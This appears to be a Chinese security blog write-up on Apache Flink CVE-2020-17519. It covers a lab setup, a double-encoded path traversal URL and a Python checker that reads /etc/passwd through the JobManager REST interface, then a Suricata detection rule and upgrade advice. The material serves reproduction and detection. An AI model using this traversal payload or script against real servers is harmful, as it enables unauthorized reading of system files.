Apache Flink漏洞（CVE-2020-17519）复现以及suricata规则检测

0x01 漏洞简介
Apache Flink是一个开源流处理框架，具有强大的流处理和批处理功能。
Apache Flink 1.11.0中引入的一项更改(包括版本1.11.1和1.11.2)允许攻击者通过JobManager进程的REST接口读取JobManager本地文件系统上的任何文件。

0x02 影响版本

1.11.0
1.11.1
1.11.2

0x03 环境搭建

 svn export https://github.com/vulhub/vulhub/trunk/flink/

进入CVE-2020-17519目录，创建环境

docker-compose up -d

访问http://ip:8081
0x04 漏洞复现
poc

/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd

python脚本

#-*- coding:utf-8 -*-
#affected versions are Apache Flink 1.11.0-1.11.2
import requests
import sys

def apache(url):
	#url ="http://192.168.124.132:8081"
	headers = {
     "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"}
	poc="/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd"
	req =requests.get(url=url+poc,headers=headers)
	if "/bin/bash" in req.text:
		print("存在漏洞")
	else:
		print("不存在漏洞")


if  __name__ == '__main__':
	if len(sys.argv) != 2:
		print("python cev-2020.17519.py http://xxx.xxx.xxx.xxx:8081")
	else:
		url =sys.argv[1]
		apache(url)

0x05 suricat规则以及检测
规则

alert http any any -> any any (msg:"[CVE-2020-17519]Apache Flink目录文件读取"; content:"/jobmanager/logs/"; http_uri;content:"%252f";distance:0; content:"%252fetc%252fpasswd";distance:0;classtype:web-application-attack; sid:2101060301; rev:1;)

检测

0x06 修复建议

升级版本

版本下载地址
https://flink.apache.org/downloads.html